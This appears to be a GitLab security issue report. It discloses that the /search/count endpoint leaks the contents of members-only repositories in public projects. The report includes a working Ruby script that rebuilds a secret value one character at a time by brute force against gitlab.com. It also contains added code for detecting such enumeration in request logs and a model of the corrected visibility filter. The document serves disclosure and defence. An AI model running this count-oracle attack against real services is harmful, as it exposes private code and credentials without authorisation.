Search count can leak content of private repositories in public projects
### Summary
Using `https://gitlab.com/search/count` it is possible to leak information from private repositories in public projects.
### Steps to reproduce
The following script illustrates the issue by leaking, character by character, the [`GITLAB_APP_SECRET`](https://gitlab.com/gitlab-org/customers-gitlab-com/-/blob/main/.env.example#L6) test value from the `customers-gitlab-com` repository, which is not public (although the project is). (Note that the value isn't secret; it's defined [here](https://gitlab.com/gitlab-org/gitlab/blob/9f04c2234bf6ba4f4a7619d1718afab5a26accfe/db/fixtures/development/28_integrations.rb#L17-L17).)
```ruby
#!/usr/bin/ruby
require 'httparty'
require 'json'
require 'cgi' # CGI.escape is used when building the search URL

COUNT = '
     .wwwwwwww.
   .w"  "WW"  "w.
  ."   /\  /\   ".
 |\     o  o     /|
 \|    ___\/___  |/
 / \  \_v__v_/  / \
/  |  \________/ | \
>   \   WWWW   /  <
 \   \   ""   /  /
  \   \      /  /
'

repo_id = '2670515'                   # gitlab-org/customers-gitlab-com
group_id = '9970'                     # gitlab-org
partial_string = 'GITLAB_APP_SECRET=' # known prefix of the value being recovered

puts COUNT
puts
puts '~> Starting the count attack!'
puts

@chars = %w[a b c d e f 0 1 2 3 4 5 6 7 8 9] # alphabet to try; adjust as needed

# Extend `str` one character at a time: a non-zero hit count for the quoted
# phrase "<str><c>" means that longer prefix exists in the repository.
def find_next(url, str)
  @chars.each do |c|
    response = HTTParty.get(url + str + c + '%22') # %22 closes the quoted phrase
    count = JSON.parse(response.body)
    if count['count'] != '0'
      follow = str + c
      puts "~> Count found: #{follow}"
      find_next(url, follow)
    end
  end
end

# r%3A<project id> limits the blob search to one repository; %20%22 opens the quoted phrase.
find_next("https://gitlab.com/search/count?group_id=#{group_id}&scope=blobs&search=r%3A#{repo_id}%20%22#{CGI.escape(partial_string)}", '')
```
In the demo script we limit the search to the `customers-gitlab-com` repository with `r:2670515` in the query; `2670515` is that repository's project id.
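The request pattern the script above produces is distinctive: one client issues a run of `/search/count` requests whose search term grows by exactly one character at a time, with several siblings tried under each prefix. The following detection logic is an added example, not part of this report or of GitLab's code; the log lines are constructed for the example with simplified field names (`remote_ip`, `path`, `search`), not real GitLab log output. It groups count requests by client, measures the deepest one-character-extension chain per client, and flags clients whose chain exceeds a threshold.

```ruby
require 'json'

# Constructed sample log lines (not real GitLab log output): one client walking
# a prefix one character at a time, plus ordinary searches from another client.
SAMPLE_LOG = [
  '{"remote_ip":"203.0.113.7","path":"/search/count","search":"r:2670515 GITLAB_APP_SECRET="}',
  '{"remote_ip":"203.0.113.7","path":"/search/count","search":"r:2670515 GITLAB_APP_SECRET=a"}',
  '{"remote_ip":"203.0.113.7","path":"/search/count","search":"r:2670515 GITLAB_APP_SECRET=b"}',
  '{"remote_ip":"203.0.113.7","path":"/search/count","search":"r:2670515 GITLAB_APP_SECRET=b1"}',
  '{"remote_ip":"203.0.113.7","path":"/search/count","search":"r:2670515 GITLAB_APP_SECRET=b1f"}',
  '{"remote_ip":"198.51.100.4","path":"/search/count","search":"rake db:migrate"}',
  '{"remote_ip":"198.51.100.4","path":"/search","search":"Gemfile.lock"}',
  '{"remote_ip":"198.51.100.4","path":"/search/count","search":"rake"}'
].freeze

# Length of the longest chain of terms, in arrival order, where each term is
# the previous one plus exactly one trailing character.
def longest_prefix_chain(terms)
  best = {} # term => longest chain ending at that term
  terms.each do |term|
    parent = term[0...-1]
    best[term] = [best[term] || 1, (best[parent] || 0) + 1].max
  end
  best.values.max || 0
end

# Return { remote_ip => chain depth } for every client whose /search/count
# requests form a one-character-extension chain at least `min_depth` long.
def flag_enumeration(log_lines, min_depth: 3)
  by_ip = Hash.new { |h, k| h[k] = [] }
  log_lines.each do |line|
    entry = JSON.parse(line)
    next unless entry['path'] == '/search/count'

    by_ip[entry['remote_ip']] << entry['search'].to_s
  end
  by_ip.each_with_object({}) do |(ip, terms), flagged|
    depth = longest_prefix_chain(terms)
    flagged[ip] = depth if depth >= min_depth
  end
end

if __FILE__ == $PROGRAM_NAME
  flag_enumeration(SAMPLE_LOG).each do |ip, depth|
    puts "#{ip}: prefix-extension chain of depth #{depth} against /search/count"
  end
end
```

The threshold of three is a starting point; a legitimate user refining a search rarely extends it one character per request across several requests, while the script above does so for every recovered character, so the depth grows with the length of the leaked value.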
### What is the current *bug* behavior?
Search hit count leaks for private repos in public projects.
### What is the expected *correct* behavior?
The search hit count should not include private repositories.
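The root of the leak is that project visibility and repository visibility are separate settings: a public project can restrict its repository to members, and a count that filters on project visibility alone still includes blobs from that repository. The following is an added example modelling the rule the count endpoint must apply; it is not GitLab's code, and the `Project` struct, its `:members_only`/`:everyone`/`:disabled` access levels and the sample data are constructed for the example. It shows the leaky filter beside the corrected one on the same input.

```ruby
# Constructed model of a project: visibility is :public or :private; the
# repository feature has its own access level (hypothetical names).
Project = Struct.new(:id, :visibility, :repository_access, :members, :blobs)

# A repository is readable when the user is a member, or when both the
# project and its repository feature are open to everyone.
def repository_readable?(user, project)
  return false if project.repository_access == :disabled
  return true if user && project.members.include?(user)

  project.visibility == :public && project.repository_access == :everyone
end

def count_hits(projects, term)
  projects.sum { |p| p.blobs.count { |blob| blob.include?(term) } }
end

# Corrected behaviour: count blob hits only in repositories the user may read.
def blob_hit_count(user, projects, term)
  count_hits(projects.select { |p| repository_readable?(user, p) }, term)
end

# Leaky behaviour for comparison: filters on project visibility alone, so a
# public project's members-only repository still contributes to the count.
def leaky_blob_hit_count(user, projects, term)
  visible = projects.select do |p|
    p.visibility == :public || (user && p.members.include?(user))
  end
  count_hits(visible, term)
end

# Constructed sample data; the "secret" strings are placeholders.
PROJECTS = [
  Project.new(1, :public,  :members_only, ['alice'], ['GITLAB_APP_SECRET=b1f-placeholder']),
  Project.new(2, :public,  :everyone,     ['bob'],   ['README: nothing sensitive here']),
  Project.new(3, :private, :everyone,     ['carol'], ['GITLAB_APP_SECRET=zzz-placeholder'])
].freeze

if __FILE__ == $PROGRAM_NAME
  term = 'GITLAB_APP_SECRET=b'
  puts "anonymous, leaky filter:     #{leaky_blob_hit_count(nil, PROJECTS, term)}"
  puts "anonymous, corrected filter: #{blob_hit_count(nil, PROJECTS, term)}"
  puts "alice (member), corrected:   #{blob_hit_count('alice', PROJECTS, term)}"
end
```

With the corrected filter an anonymous user gets a count of 0 for a term that only occurs in project 1's members-only repository, so the probe no longer distinguishes a correct prefix guess from a wrong one; the leaky filter returns 1 and gives the oracle the script relies on.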
### Relevant logs and/or screenshots

### Output of checks
This bug happens on GitLab.com
---
cc @gitlab-com/gl-security/appsec